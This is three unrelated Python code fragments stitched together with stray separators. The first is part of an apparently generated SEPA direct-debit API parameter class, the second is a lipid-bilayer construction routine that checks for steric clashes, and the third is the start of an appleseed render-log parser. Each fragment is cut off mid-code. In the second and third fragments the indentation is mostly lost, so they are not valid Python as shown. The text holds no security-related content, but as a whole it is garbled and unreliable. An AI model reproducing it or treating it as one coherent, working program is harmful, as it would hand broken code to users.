    :param banking_pin: The banking_pin of this RequestSepaDirectDebitParams.  # noqa: E501
    :type: str
    """
    # Optional field: no validation, None is acceptable.
    self._banking_pin = banking_pin
@property
def two_step_procedure_id(self):
    """Gets the two_step_procedure_id of this RequestSepaDirectDebitParams.  # noqa: E501

    The bank-given ID of the two-step-procedure that should be used for the direct debit order. For a list of available two-step-procedures, see the corresponding bank connection (GET /bankConnections). If this field is not set, then the bank connection's default two-step procedure will be used. Note that in this case, when the bank connection has no default two-step procedure set, then the service will return an error (see response messages for details).  # noqa: E501

    :return: The two_step_procedure_id of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: str
    """
    return self._two_step_procedure_id

@two_step_procedure_id.setter
def two_step_procedure_id(self, two_step_procedure_id):
    """Sets the two_step_procedure_id of this RequestSepaDirectDebitParams.

    The bank-given ID of the two-step-procedure that should be used for the direct debit order. For a list of available two-step-procedures, see the corresponding bank connection (GET /bankConnections). If this field is not set, then the bank connection's default two-step procedure will be used. Note that in this case, when the bank connection has no default two-step procedure set, then the service will return an error (see response messages for details).  # noqa: E501

    :param two_step_procedure_id: The two_step_procedure_id of this RequestSepaDirectDebitParams.  # noqa: E501
    :type: str
    """
    # Optional field: no validation, None is acceptable.
    self._two_step_procedure_id = two_step_procedure_id
@property
def direct_debit_type(self):
    """Gets the direct_debit_type of this RequestSepaDirectDebitParams.  # noqa: E501

    Type of the direct debit; either <code>BASIC</code> or <code>B2B</code> (Business-To-Business). Please note that an account which supports the basic type must not necessarily support B2B (or vice versa). Check the source account's 'supportedOrders' field to find out which types of direct debit it supports.<br/><br/>  # noqa: E501

    :return: The direct_debit_type of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: str
    """
    return self._direct_debit_type

@direct_debit_type.setter
def direct_debit_type(self, direct_debit_type):
    """Sets the direct_debit_type of this RequestSepaDirectDebitParams.

    Type of the direct debit; either <code>BASIC</code> or <code>B2B</code> (Business-To-Business). Please note that an account which supports the basic type must not necessarily support B2B (or vice versa). Check the source account's 'supportedOrders' field to find out which types of direct debit it supports.<br/><br/>  # noqa: E501

    :param direct_debit_type: The direct_debit_type of this RequestSepaDirectDebitParams.  # noqa: E501
    :type: str

    :raises ValueError: if direct_debit_type is None or not an allowed value
    """
    # Required field: reject None, then enforce the closed set of
    # values accepted by the API (case-sensitive comparison).
    if direct_debit_type is None:
        raise ValueError("Invalid value for `direct_debit_type`, must not be `None`")  # noqa: E501
    allowed_values = ["B2B", "BASIC"]  # noqa: E501
    if direct_debit_type not in allowed_values:
        raise ValueError(
            "Invalid value for `direct_debit_type` ({0}), must be one of {1}"  # noqa: E501
            .format(direct_debit_type, allowed_values)
        )
    self._direct_debit_type = direct_debit_type
@property
def sequence_type(self):
    """Gets the sequence_type of this RequestSepaDirectDebitParams.  # noqa: E501

    Sequence type of the direct debit. Possible values:<br/><br/>&bull; <code>OOFF</code> - means that this is a one-time direct debit order<br/>&bull; <code>FRST</code> - means that this is the first in a row of multiple direct debit orders<br/>&bull; <code>RCUR</code> - means that this is one (but not the first or final) within a row of multiple direct debit orders<br/>&bull; <code>FNAL</code> - means that this is the final in a row of multiple direct debit orders<br/><br/>  # noqa: E501

    :return: The sequence_type of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: str
    """
    return self._sequence_type

@sequence_type.setter
def sequence_type(self, sequence_type):
    """Sets the sequence_type of this RequestSepaDirectDebitParams.

    Sequence type of the direct debit. Possible values:<br/><br/>&bull; <code>OOFF</code> - means that this is a one-time direct debit order<br/>&bull; <code>FRST</code> - means that this is the first in a row of multiple direct debit orders<br/>&bull; <code>RCUR</code> - means that this is one (but not the first or final) within a row of multiple direct debit orders<br/>&bull; <code>FNAL</code> - means that this is the final in a row of multiple direct debit orders<br/><br/>  # noqa: E501

    :param sequence_type: The sequence_type of this RequestSepaDirectDebitParams.  # noqa: E501
    :type: str

    :raises ValueError: if sequence_type is None or not an allowed value
    """
    # Required field: reject None, then enforce the SEPA sequence codes
    # accepted by the API (case-sensitive comparison).
    if sequence_type is None:
        raise ValueError("Invalid value for `sequence_type`, must not be `None`")  # noqa: E501
    allowed_values = ["OOFF", "FRST", "RCUR", "FNAL"]  # noqa: E501
    if sequence_type not in allowed_values:
        raise ValueError(
            "Invalid value for `sequence_type` ({0}), must be one of {1}"  # noqa: E501
            .format(sequence_type, allowed_values)
        )
    self._sequence_type = sequence_type
@property
def execution_date(self):
    """Gets the execution_date of this RequestSepaDirectDebitParams.  # noqa: E501

    Execution date for the direct debit(s), in the format 'yyyy-MM-dd'.  # noqa: E501

    :return: The execution_date of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: str
    """
    return self._execution_date

@execution_date.setter
def execution_date(self, execution_date):
    """Sets the execution_date of this RequestSepaDirectDebitParams.

    Execution date for the direct debit(s), in the format 'yyyy-MM-dd'.  # noqa: E501

    :param execution_date: The execution_date of this RequestSepaDirectDebitParams.  # noqa: E501
    :type: str
    """
    # Required field: reject None explicitly.  NOTE(review): the
    # 'yyyy-MM-dd' format is documented but not validated here.
    if execution_date is None:
        raise ValueError("Invalid value for `execution_date`, must not be `None`")  # noqa: E501
    self._execution_date = execution_date
@property
def direct_debits(self):
    """Gets the direct_debits of this RequestSepaDirectDebitParams.  # noqa: E501

    List of the direct debits that you want to execute. Please check the account's 'supportedOrders' field to find out whether you can pass multiple direct debits or just one.  # noqa: E501

    :return: The direct_debits of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: list[SingleDirectDebitData]
    """
    return self._direct_debits
@direct_debits.setter
def direct_debits(self, direct_debits):
"""Sets the direct_debits of this RequestSepaDirectDebitParams.
List of the direct debits that you want to execute. Please check the account's 'supportedOrders' field to find out whether you can pass multiple direct debits or just one. # noqa: E501
:param direct_debits: The direct_debits | |
the tessellated 3D triangle
u = tile_triangle[0] - tile_triangle.center()
v = tile_triangle[1] - tile_triangle.center()
r1_r2_angle = angle_between(u, v)
u = tile_triangle[0] - tile_triangle.center()
v = tile_triangle[2] - tile_triangle.center()
r1_r3_angle = angle_between(u, v)
# calculate the appropriate location of an identical triangle on the user-defined planar-bilayer model. ignoring z for now (since lipid is oriented along x-y plane)
lipid_triangle_pt1 = numpy.array([0.0, tile_r1, 0.0])
lipid_triangle_pt2 = numpy.array([-tile_r2 * numpy.cos(r1_r2_angle - (numpy.pi/2.0)), -tile_r2 * numpy.sin(r1_r2_angle - (numpy.pi/2.0)), 0.0])
lipid_triangle_pt3 = numpy.array([tile_r3 * numpy.cos(r1_r3_angle - (numpy.pi/2.0)), -tile_r3 * numpy.sin(r1_r3_angle - (numpy.pi/2.0)), 0.0])
# rotate the identical triangle randomly about z axis
random_theta = numpy.random.uniform(0, 2.0 * numpy.pi)
rot_matrix = numpy.array([[numpy.cos(random_theta), numpy.sin(random_theta), 0.0], [-numpy.sin(random_theta), numpy.cos(random_theta), 0.0], [0.0, 0.0, 1.0]])
lipid_triangle_pt1 = numpy.dot(rot_matrix, lipid_triangle_pt1)
lipid_triangle_pt2 = numpy.dot(rot_matrix, lipid_triangle_pt2)
lipid_triangle_pt3 = numpy.dot(rot_matrix, lipid_triangle_pt3)
# now pick an appropriate location, and move the identical triangle to that location along x-y plane
lipid_triangle_center_x = numpy.random.uniform(min_headgroups[0]+tile_triangle.max_radius(), max_headgroups[0]-tile_triangle.max_radius())
lipid_triangle_center_y = numpy.random.uniform(min_headgroups[1]+tile_triangle.max_radius(), max_headgroups[1]-tile_triangle.max_radius())
lipid_triangle_center = numpy.array([lipid_triangle_center_x, lipid_triangle_center_y, 0.0])
lipid_triangle_pt1 = lipid_triangle_pt1 + lipid_triangle_center
lipid_triangle_pt2 = lipid_triangle_pt2 + lipid_triangle_center
lipid_triangle_pt3 = lipid_triangle_pt3 + lipid_triangle_center
lipid_triangle = numpy.array([lipid_triangle_pt1, lipid_triangle_pt2, lipid_triangle_pt3])
# now get the transformation matrix to transform the identical triangle onto the 3D tessellated triangle
# and apply the transformation
transform_data = get_transformation_data(tile_triangle.points, lipid_triangle)
lipid.undo()
apply_transformation(lipid,transform_data)
# project the headgroups of the planar bilayer onto the identical triangle
headgroup_markers_indices = lipid.get_indices_of_mask_match(params['lipid_headgroup_marker'])
headgroup_markers_coors = lipid.all_atoms_numpy[headgroup_markers_indices]
headgroup_marker_proj_coors = tile_triangle.project_points_onto_triangle(headgroup_markers_coors)
# identify the indices of the head groups that fall within the triangle when projected
headgroup_indices_to_keep = get_numpy_slice(headgroup_markers_indices, tile_triangle.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors))
# there are legitimate circumstances where no headgroups should be retained (i.e., no headgroups fall within the triangle boundaries)
# for example, sometimes the scipy tessellation could produce "triangles" that are actually lines.
# so abort efforts if this is the case.
if len(headgroup_indices_to_keep) == 0 and len(headgroup_marker_proj_coors) !=0:
molecules_in_this_triangle = []
if params['use_disk_instead_of_memory'] == "TRUE":
an_id = save_pickle(molecules_in_this_triangle, params)
self.results.append((tile_triangle, an_id))
else: self.results.append((tile_triangle, molecules_in_this_triangle))
return
# identify the indices of the head groups that fall within a smaller triangle, that are too far from the edges to worry about steric clashes in subsequent steps.
# this speeds up subsequent steps significantly
smaller_tri = tile_triangle.new_triangle_expanded_by_margin(-params['clashing_potential_margin'])
todel = smaller_tri.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors)
headgroup_indices_not_in_triangle_margin = get_numpy_slice(headgroup_markers_indices, todel)
# identify the indices of the head groups that fall within an even smaller triangle, called the submargin.
# identifying these headgroups will speed up the lipid-filling step later. Lipids will be placed in the margin, and the steric clashes are checked with the lipids of the submargin (as well as the margins of neighboring triangles)
smaller_still_tri = smaller_tri.new_triangle_expanded_by_margin(-params['clashing_potential_margin'])
todel = smaller_still_tri.get_indices_of_points_within_triangle_boundaries(headgroup_marker_proj_coors)
headgroup_indices_not_in_triangle_margin_or_submargin = get_numpy_slice(headgroup_markers_indices, todel)
# now get the entire lipids corresponding to these headgroups
molecules_in_this_triangle = []
# first, identify all residues
atom_counts = len(lipid.atom_inf_resids)
all_ids = numpy.core.defchararray.add(lipid.atom_inf_string_vals[:,0], numpy.array(['_'] * atom_counts))
all_ids = numpy.core.defchararray.add(all_ids, lipid.atom_inf_resids)
all_ids = numpy.core.defchararray.add(all_ids, numpy.array(['_'] * atom_counts))
all_ids = numpy.core.defchararray.add(all_ids, lipid.atom_inf_string_vals[:,1])
# now identify all residues to keep
atom_counts = len(headgroup_indices_to_keep)
if atom_counts != 0:
hg_ids = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_to_keep,0], numpy.array(['_'] * atom_counts))
hg_ids = numpy.core.defchararray.add(hg_ids, lipid.atom_inf_resids[headgroup_indices_to_keep])
hg_ids = numpy.core.defchararray.add(hg_ids, numpy.array(['_'] * atom_counts))
hg_ids = numpy.core.defchararray.add(hg_ids, lipid.atom_inf_string_vals[headgroup_indices_to_keep,1])
else:
hg_ids = numpy.array([])
# now identify all residues to never delete (inside inner triangle)
atom_counts = len(headgroup_indices_not_in_triangle_margin)
if atom_counts != 0:
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin,0], numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, lipid.atom_inf_resids[headgroup_indices_not_in_triangle_margin])
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin, lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin,1])
else:
hg_ids_not_in_triangle_margin = numpy.array([])
# now identify all residues that are even interior to the submargin
atom_counts = len(headgroup_indices_not_in_triangle_margin_or_submargin)
if atom_counts != 0:
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin_or_submargin,0], numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, lipid.atom_inf_resids[headgroup_indices_not_in_triangle_margin_or_submargin])
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, numpy.array(['_'] * atom_counts))
hg_ids_not_in_triangle_margin_or_submargin = numpy.core.defchararray.add(hg_ids_not_in_triangle_margin_or_submargin, lipid.atom_inf_string_vals[headgroup_indices_not_in_triangle_margin_or_submargin,1])
else:
hg_ids_not_in_triangle_margin_or_submargin = numpy.array([])
# remove the lipids that are beyond the bounds of this triangle to speed up subsequent searching
# Find the indices of elements of all_ids that are in hg_ids.
iall_ids = numpy.in1d(all_ids.ravel(), hg_ids).reshape(all_ids.shape)
indices_of_lipids_to_keep = numpy.where(iall_ids)[0]
lipid = lipid.portion_of(indices_of_lipids_to_keep)
all_ids = all_ids[indices_of_lipids_to_keep]
# find where to split this lipid model into individual lipids
all_ids_offset = all_ids.copy()
all_ids_offset = numpy.append(all_ids_offset, all_ids_offset[0])
all_ids_offset = all_ids_offset[numpy.arange(1, len(all_ids_offset), dtype=int)]
indices_of_each_lipid = 1 + numpy.nonzero(numpy.logical_not(all_ids == all_ids_offset))[0]
indices_of_each_lipid = numpy.insert(indices_of_each_lipid,0,0)
# now move each individual lipid into its own object and append
gc.disable() # because appending objects
for t in range(len(indices_of_each_lipid)-1):
start_index = indices_of_each_lipid[t]
end_index = indices_of_each_lipid[t+1]
atom_range = numpy.arange(start_index, end_index, dtype=int)
single_lipid = lipid.portion_of(atom_range)
single_lipid.in_triangle_submargin = False
single_lipid.in_triangle_margin = True
### POSSIBLE FUTURE PROBLEM HERE. ###
# See https://stackoverflow.com/questions/40659212/futurewarning-elementwise-comparison-failed-returning-scalar-but-in-the-futur
# Kicking the can down the road, as suggested...
with warnings.catch_warnings(): # Kicking the can
warnings.simplefilter(action='ignore', category=FutureWarning) # down the road...
if all_ids[start_index] in hg_ids_not_in_triangle_margin:
single_lipid.in_triangle_margin = False
if not all_ids[start_index] in hg_ids_not_in_triangle_margin_or_submargin:
single_lipid.in_triangle_submargin = True
molecules_in_this_triangle.append(single_lipid)
if params['use_disk_instead_of_memory'] == "TRUE":
an_id = save_pickle(molecules_in_this_triangle, params)
self.results.append((tile_triangle, an_id))
else: self.results.append((tile_triangle, molecules_in_this_triangle))
gc.enable()
input_array = [(params, lipid, tile_triangle, min_headgroups, max_headgroups, index+1) for index, tile_triangle in enumerate(all_triangles)]
tmp = multi_threading(input_array, params['number_of_processors'], position_lipids_multiprocessing, params, "REMARK ")
molecules_by_triangle = tmp.results
return molecules_by_triangle
################## REMOVE STERIC CLASHES ##################
def remove_steric_clashes(molecules_by_triangle, params):
"""Remove lipids that have steric clashes
Arguments:
molecules_by_triangle -- A list of tuples, where each tuple contains a Triangle object and a list of lipid molecules (Molecule objects) that belong to that triangle
params -- A dictionary, the user-specified command-line parameters
"""
class remove_clashes_multiprocessing(general_task):
    """A class for identifying lipids that have steric clashes"""

    def value_func(self, item, results_queue): # so overwriting this function
        """Identify lipids that have steric clashes between two triangles

        Arguments:
        item -- A list or tuple, the input data required for the calculation:
                (triangle_index1, triangle_index2, triangle1, triangle1_lipids,
                 triangle2, triangle2_lipids, params, progress_marker)
        results_queue -- A multiprocessing.Queue() object for storing the calculation output

        Appends to self.results a "clash map": a dict keyed by
        (lipid_index, triangle_index) whose value lists the clashing
        (lipid_index, triangle_index) partners; each clash is recorded in
        both directions. Nothing is appended when the two triangles are
        not near each other.
        """
        triangle_index1 = item[0]
        triangle_index2 = item[1]
        triangle1 = item[2]
        triangle1_lipids = item[3]
        triangle2 = item[4]
        triangle2_lipids = item[5]
        params = item[6]
        self.print_star_if_appropriate(item[7])

        if triangle1.near_other_triangle(triangle2, params): # so only the lipids of proximate triangles are considered
            if params['use_disk_instead_of_memory'] == "TRUE":
                triangle1_lipids = load_pickle(triangle1_lipids, params)
                triangle2_lipids = load_pickle(triangle2_lipids, params)
            clash_map = {}

            def headgroup_coords(lipids):
                """Return an (N, 3) numpy array of the lipids' headgroup coordinates."""
                coords = numpy.empty((len(lipids), 3))
                for i, lip in enumerate(lipids):
                    loc = lip.all_atoms_numpy[lip.get_headgroup_index(params['lipid_headgroup_marker'])]
                    coords[i][0] = loc[0]
                    coords[i][1] = loc[1]
                    coords[i][2] = loc[2]
                return coords

            # numpy arrays containing all the headgroups of the lipids of each triangle
            triangle1_headgroups = headgroup_coords(triangle1_lipids)
            triangle2_headgroups = headgroup_coords(triangle2_lipids)

            # indices of the lipids in each triangle's margin; only those can
            # clash with lipids of a neighboring triangle
            indices_in_margin1 = numpy.array(
                [idx for idx, lip in enumerate(triangle1_lipids) if lip.in_triangle_margin])
            indices_in_margin2 = numpy.array(
                [idx for idx, lip in enumerate(triangle2_lipids) if lip.in_triangle_margin])

            if len(indices_in_margin1) > 0 and len(indices_in_margin2) > 0:
                # distances between all margin headgroups, thresholded to find
                # the pairs close enough to potentially clash
                dists = cdist(triangle1_headgroups[indices_in_margin1],
                              triangle2_headgroups[indices_in_margin2])
                close_enough = dists < params['very_distant_lipids_cutoff']
                rows, cols = numpy.nonzero(close_enough)
                indices_to_look_at1 = indices_in_margin1[rows]
                indices_to_look_at2 = indices_in_margin2[cols]
                # now do a pairwise comparison of the candidate lipids, looking for clashes
                for t in range(len(indices_to_look_at1)):
                    lipid_index1 = indices_to_look_at1[t]
                    lipid1 = triangle1_lipids[lipid_index1]
                    if not lipid1.in_triangle_margin:
                        continue
                    lipid_index2 = indices_to_look_at2[t]
                    lipid2 = triangle2_lipids[lipid_index2]
                    if not lipid2.in_triangle_margin:
                        continue
                    if two_lipids_clash(lipid1, lipid2, params['clash_cutoff'], 1, params, False):
                        # there's a clash: record it in both directions.
                        # setdefault replaces the original bare try/except,
                        # which could mask unrelated errors (e.g. KeyboardInterrupt).
                        key1 = (lipid_index1, triangle_index1)
                        key2 = (lipid_index2, triangle_index2)
                        clash_map.setdefault(key1, []).append(key2)
                        clash_map.setdefault(key2, []).append(key1)
            self.results.append(clash_map)
# generate a clash map, whcih specifies which lipids clash with each other
some_input = []
gc.disable() # because appending complex objects to a list
t = 0
for triangle_index1 in range(len(molecules_by_triangle)-1):
for triangle_index2 in range(triangle_index1 + 1, len(molecules_by_triangle)):
t = | |
import datetime
import csv
import re
import os.path
import sys
#from PyQt4 import uic, QtGui, QtCore
from PySide import QtUiTools, QtGui, QtCore
import functools
#http://thomas-cokelaer.info/tutorials/sphinx/docstring_python.html
################################################################################
# Prepare regex
#
# All patterns are raw strings so that regex escapes such as \s and \d are not
# (mis)interpreted as string escape sequences (unrecognized escapes in normal
# strings are deprecated and raise SyntaxWarning / eventually SyntaxError in
# recent Python versions). The pattern text is byte-identical to before.
################################################################################
# Common prefix of every log line:
#   <ISO timestamp> <thread id> <vm> MB <category> |<message>
re_main = re.compile( r'(?P<timestamp>[0-9TZ:.-]+)\s+'
                      r'\<(?P<thread_id>\d{3})\>\s+'
                      r'(?P<vm>\d+)\s+MB\s+'
                      r'(?P<msg_cat>\w+)\s+'
                      r'\|(?P<msg_rest>.*)\n?' )
# The patterns below are matched against the msg_rest part only.
re_opening_texture_file = re.compile( r'\s*opening texture file (?P<texture_path>[\w./\\-]+) for reading\.\.\.' )
re_rendering_progress = re.compile( r'\s*rendering\, (?P<percentage>[\d.]+)\% done' )
re_wrote_image_file = re.compile( r'\s*wrote image file (?P<image_path>[\w./\\-]+) in (?P<milliseconds>[\d,]+) ms\.' )
re_project_file_path = re.compile( r'\s*loading project file (?P<project_file_path>[\w./\\-]+)\.\.\.' )
re_loaded_mesh_file = re.compile( r'\s*loaded mesh file (?P<mesh_path>[\w./\\-]+) '
                                  r'\((?P<objects>[\d,]+) object, '
                                  r'(?P<vertices>[\d,]+) vertices, '
                                  r'(?P<triangles>[\d,]+) triangles\) '
                                  r'in (?P<milliseconds>[\d,]+) ms\.' )
re_scene_bounding_box = re.compile(
    r'\s*scene bounding box\: '
    r'\((?P<pt1_x>[0-9.-]+)\, (?P<pt1_y>[0-9.-]+)\, (?P<pt1_z>[0-9.-]+)\)\-'
    r'\((?P<pt2_x>[0-9.-]+)\, (?P<pt2_y>[0-9.-]+)\, (?P<pt2_z>[0-9.-]+)\)\.' )
re_scene_diameter = re.compile( r'\s*scene diameter\: (?P<diameter>[0-9.-]+)\.' )
re_while_loading_mesh_object = re.compile( r'\s*while loading mesh object \"(?P<object>[\w.]+)\"\:(?P<problem>.+)' )
# option regex (the "frame settings:" block and its individual entries)
re_opt_frame_settings_trigger = re.compile( r'\s*frame settings\:' )
re_opt_frame_settings_resolution = re.compile( r'\s*resolution\s+(?P<x_resolution>[\d,]+) x (?P<y_resolution>[\d,]+)' )
re_opt_frame_settings_tile_size = re.compile( r'\s*tile size\s+(?P<x_resolution>[\d,]+) x (?P<y_resolution>[\d,]+)' )
re_opt_frame_settings_pixel_format = re.compile( r'\s*pixel format\s+(?P<pixel_format>[\w]+)' )
re_opt_frame_settings_filter = re.compile( r'\s*filter\s+(?P<filter>[\w]+)' )
re_opt_frame_settings_filter_size = re.compile( r'\s*filter size\s+(?P<filter_size>[\d.]+)' )
re_opt_frame_settings_color_space = re.compile( r'\s*color space\s+(?P<color_space>[\w]+)' )
re_opt_frame_settings_premult_alpha = re.compile( r'\s*premult\. alpha\s+(?P<premult_alpha>(on|off))' )
re_opt_frame_settings_clamping = re.compile( r'\s*clamping\s+(?P<clamping>(on|off))' )
re_opt_frame_settings_gamma_correction = re.compile( r'\s*gamma correction\s+(?P<gamma_correction>[\w]+)' )
re_opt_frame_settings_crop_window = re.compile( r'\s*crop window\s+\((?P<x_top_left>[\d,]+), (?P<y_top_left>[\d,]+)\)-\((?P<x_bottom_right>[\d,]+), (?P<y_bottom_right>[\d,]+)\)' )
# strptime format matching the log's ISO-8601-with-microseconds timestamps
datetime_str_format = '%Y-%m-%dT%H:%M:%S.%fZ'
class ASLogLine( object ) :
    """Class representing a parsed line of an appleseed log file

    Parsing happens once, in the constructor; the parsed fields are then
    available as attributes.  msg_content['type'] identifies the kind of
    message that was recognized (None when only the common prefix matched).
    """
    # __slots__ keeps per-line memory low; a log may hold very many lines.
    __slots__ = ( 'line' ,                 # the whole line string
                  'number' ,               # the line number
                  '_raw_timestamp' ,       # timestamp string, still unparsed
                  '_timestamp' ,           # cached datetime (built lazily by `timestamp`)
                  'thread_id' ,            # int, from the <nnn> field
                  'vm' ,                   # int, virtual-memory figure in MB
                  'msg_cat' ,              # debug/info/warning/error
                  'msg_rest' ,             # Everything after the pipe
                  'msg_content' ,          # Details of msg_rest (dict)
                  'frame_setting_trigger' ) # True when this line opens a "frame settings:" block
    def __init__( self, line, number = -1 ) :
        """Init the class instance

        line   -- the raw log line (a string)
        number -- index of the line within the log file (-1 if unknown)

        Raise a ValueError is the given line is not parsable
        """
        # NOTE(review): `basestring` implies this module targets Python 2.
        assert isinstance( line , basestring ), type( line )
        assert isinstance( number, int ), type( number )
        self.line = line
        self.number = number
        self._raw_timestamp = None
        self._timestamp = None
        self.thread_id = None
        self.vm = None
        self.msg_cat = None
        self.msg_rest = None
        self.msg_content = {}
        # option triggers
        self.frame_setting_trigger = False
        self.__parse()
    def __parse( self ) :
        """Parse line content and fill the ASLogLine instance

        The common prefix (timestamp, thread id, vm, category, '|') is
        mandatory and raises ValueError when absent.  Each known message
        pattern is then tried in turn against the remainder; patterns are
        tried sequentially, so if several matched, the last one would win.
        """
        # first part of the line (always the same pattern)
        match_grp = re_main.match( self.line )
        if not match_grp :
            raise ValueError( "Can't parse line {0.number} : {0.line}".format( self ) )
        self._raw_timestamp = match_grp.group( 'timestamp' )
        self.thread_id = int( match_grp.group( 'thread_id' ) )
        self.vm = int( match_grp.group( 'vm' ) )
        self.msg_cat = match_grp.group( 'msg_cat' )
        self.msg_rest = match_grp.group( 'msg_rest' )
        self.msg_content[ 'type' ] = None
        # Loading project file
        match_grp = re_project_file_path.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'loading_project_file'
            self.msg_content[ 'project_file_path' ] = match_grp.group( 'project_file_path' )
        # Opening texture file
        match_grp = re_opening_texture_file.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'opening_texture_file'
            self.msg_content[ 'texture_path' ] = match_grp.group( 'texture_path' )
        # Rendering progress
        match_grp = re_rendering_progress.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'rendering_progress'
            self.msg_content[ 'percentage' ] = float( match_grp.group( 'percentage' ) )
        # Write final image
        match_grp = re_wrote_image_file.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'wrote_image_file'
            self.msg_content[ 'image_path' ] = match_grp.group( 'image_path' )
            # the log prints counts with ',' thousands separators; strip them
            raw_milliseconds = match_grp.group( 'milliseconds' )
            raw_milliseconds = raw_milliseconds.replace( ',', '' )
            self.msg_content[ 'milliseconds' ] = int( raw_milliseconds )
        # Mesh file loaded
        match_grp = re_loaded_mesh_file.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'loaded_mesh_file'
            self.msg_content[ 'mesh_path' ] = match_grp.group( 'mesh_path' )
            # counts carry ',' thousands separators; strip before int()
            raw_objects = match_grp.group( 'objects' )
            raw_objects = raw_objects.replace( ',', '' )
            self.msg_content[ 'objects' ] = int( raw_objects )
            raw_vertices = match_grp.group( 'vertices' )
            raw_vertices = raw_vertices.replace( ',', '' )
            self.msg_content[ 'vertices' ] = int( raw_vertices )
            raw_triangles = match_grp.group( 'triangles' )
            raw_triangles = raw_triangles.replace( ',', '' )
            self.msg_content[ 'triangles' ] = int( raw_triangles )
            raw_milliseconds = match_grp.group( 'milliseconds' )
            raw_milliseconds = raw_milliseconds.replace( ',', '' )
            self.msg_content[ 'milliseconds' ] = int( raw_milliseconds )
        # Scene bounding box: stored as ((x1,y1,z1), (x2,y2,z2)) floats
        match_grp = re_scene_bounding_box.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'scene_bounding_box'
            self.msg_content[ 'bounding_box' ] = ( ( float( match_grp.group( 'pt1_x' ) ) ,
                                                     float( match_grp.group( 'pt1_y' ) ) ,
                                                     float( match_grp.group( 'pt1_z' ) ) ) ,
                                                   ( float( match_grp.group( 'pt2_x' ) ) ,
                                                     float( match_grp.group( 'pt2_y' ) ) ,
                                                     float( match_grp.group( 'pt2_z' ) ) ) )
        # Scene diameter (kept as a string, unlike the bounding box)
        match_grp = re_scene_diameter.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'scene_diameter'
            self.msg_content[ 'diameter' ] = match_grp.group( 'diameter' )
        # Problem while loading a mesh object
        match_grp = re_while_loading_mesh_object.match( self.msg_rest )
        if match_grp :
            self.msg_content[ 'type' ] = 'while_loading_mesh_object'
            self.msg_content[ 'object' ] = match_grp.group( 'object' )
            self.msg_content[ 'problem' ] = match_grp.group( 'problem' )
        #######################################################################
        # Triggers
        #######################################################################
        # Mark the start of a "frame settings:" section; the following lines
        # are interpreted by the consumer (see ASLog._parse).
        match_grp = re_opt_frame_settings_trigger.match( self.msg_rest )
        if match_grp :
            self.frame_setting_trigger = True
    @property
    def is_empty( self ) :
        """Return True when the line is empty or a bare newline"""
        return len( self.line ) == 0 or self.line == '\n'
    @property
    def timestamp( self ) :
        """Return a `datetime` object corresponding the given line

        Parsed lazily on first access and cached in _timestamp;
        returns None when the line carried no timestamp.
        """
        if self._timestamp is None and self._raw_timestamp is not None :
            self._timestamp = datetime.datetime.strptime( self._raw_timestamp ,
                                                          datetime_str_format )
        return self._timestamp
class ASLog( object ) :
"""The main appleseed log class
:Example:
>>> from appleseed.log_parser import ASLog
>>> as_log = ASLog('frame.1001.log')
>>> list(as_log.opened_texture_files)
['./_textures/coke_can_diff.exr', './_textures/coke_can_diff.exr', ...]
>>> as_log.ranges['vm']
(10, 108)
>>> for line in as_log:
... print line.msg_content
...
{'vertices': 16, 'mesh_path': './_geometry/...
"""
def __init__( self, path ) :
    """Open and fully parse the appleseed log file at *path*.

    path -- path to the log file to read
    """
    self._path = path
    # one ASLogLine per successfully parsed, non-empty line
    self._lines_data = list()
    # options: render options harvested from "trigger" sections (frame settings, ...)
    self._options = dict()
    # ranges: aggregate statistics over the whole log
    self._ranges = dict()
    self._ranges[ 'first_datetime' ] = None
    self._ranges[ 'last_datetime' ] = None
    # sentinel (min, max) for observed vm figures — presumably tightened
    # during _parse; TODO(review) confirm against the full _parse body
    self._ranges[ 'vm' ] = ( 9999999, -9999999 )
    self._parse()
def __len__( self ) :
    """Return the number of successfully parsed (non-empty) log lines."""
    return len( self._lines_data )
def __getitem__( self, index ) :
    """Return the ASLogLine at *index* (delegates to the list, so slices work)."""
    return self._lines_data[ index ]
@property
def _lines( self ) :
    """Lazily yield every raw line of the log file.

    The file is reopened on each access of the property and closed
    when the generator is exhausted (or garbage-collected).
    """
    with open( self._path, 'r' ) as log_file :
        for line in log_file :
            yield line
def _parse( self ) :
triggereds = set()
for i, line in enumerate( self._lines ) :
try :
line_data = ASLogLine( line, i )
except Exception :
print "Warning, can't parse line {0} : {1}".format( i , line )
continue
if line_data.is_empty :
continue
self._lines_data.append( line_data )
################################################################
# Options
################################################################
msg_rest = line_data.msg_rest
if 'frame_settings' in triggereds :
############################################################
# Frame settings
############################################################
if 'frame_settings' not in self._options :
self._options[ 'frame_settings' ] = dict()
# shortcut
d = self._options[ 'frame_settings' ]
match_grp = re_opt_frame_settings_resolution.match( msg_rest )
if match_grp :
x = match_grp.group( 'x_resolution' )
x = int( x.replace( ',', '' ) )
